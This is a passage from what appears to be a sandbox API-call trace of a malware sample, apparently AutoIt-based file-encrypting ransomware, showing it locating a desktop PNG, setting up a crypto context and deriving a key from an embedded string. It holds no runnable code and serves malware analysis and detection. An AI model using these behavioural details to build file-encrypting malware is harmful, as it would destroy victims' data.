lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0165.469] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a60 [0165.469] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0165.470] FreeLibrary (hLibModule=0x75990000) returned 1 [0165.470] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0165.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0165.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0165.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0165.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0165.470] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0165.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0165.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0165.470] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0165.470] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0165.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0165.471] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0165.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.471] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0165.471] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b149f0, ftCreationTime.dwHighDateTime=0x1d5da5b, ftLastAccessTime.dwLowDateTime=0xd70c6520, ftLastAccessTime.dwHighDateTime=0x1d5e345, ftLastWriteTime.dwLowDateTime=0xd70c6520, ftLastWriteTime.dwHighDateTime=0x1d5e345, nFileSizeHigh=0x0, nFileSizeLow=0x800b, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="q4eGaKOHIBJ.png", cAlternateFileName="Q4EGAK~1.PNG")) returned 0x90add8 [0165.473] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0165.473] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b149f0, ftCreationTime.dwHighDateTime=0x1d5da5b, ftLastAccessTime.dwLowDateTime=0xd70c6520, ftLastAccessTime.dwHighDateTime=0x1d5e345, ftLastWriteTime.dwLowDateTime=0xd70c6520, ftLastWriteTime.dwHighDateTime=0x1d5e345, nFileSizeHigh=0x0, nFileSizeLow=0x800b, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="q4eGaKOHIBJ.png", cAlternateFileName="Q4EGAK~1.PNG")) returned 0x90add8 [0165.473] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0165.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.473] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.474] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eGaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GaKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aKOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0165.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KOHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OHIBJ.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0165.475] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0165.475] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0165.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0165.475] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0165.475] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b149f0, ftCreationTime.dwHighDateTime=0x1d5da5b, ftLastAccessTime.dwLowDateTime=0xd70c6520, ftLastAccessTime.dwHighDateTime=0x1d5e345, ftLastWriteTime.dwLowDateTime=0xd70c6520, ftLastWriteTime.dwHighDateTime=0x1d5e345, nFileSizeHigh=0x0, nFileSizeLow=0x800b, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="q4eGaKOHIBJ.png", cAlternateFileName="Q4EGAK~1.PNG")) returned 0x90af58 [0165.476] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0165.476] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0165.476] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0165.476] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0165.476] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0165.476] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.476] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.476] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0165.477] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0165.477] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0165.477] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0165.478] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0165.478] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0165.478] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0165.478] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.478] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0165.478] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.478] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0165.478] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0165.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0165.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0165.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0165.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0165.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0165.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0165.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x8def60, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XNGnHuBtZMP7Oc4UntiQCY9VF", lpUsedDefaultChar=0x0) returned 26 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0165.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0165.480] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0165.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0165.481] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0165.481] HeapFree (in: hHeap=0x8a0000, 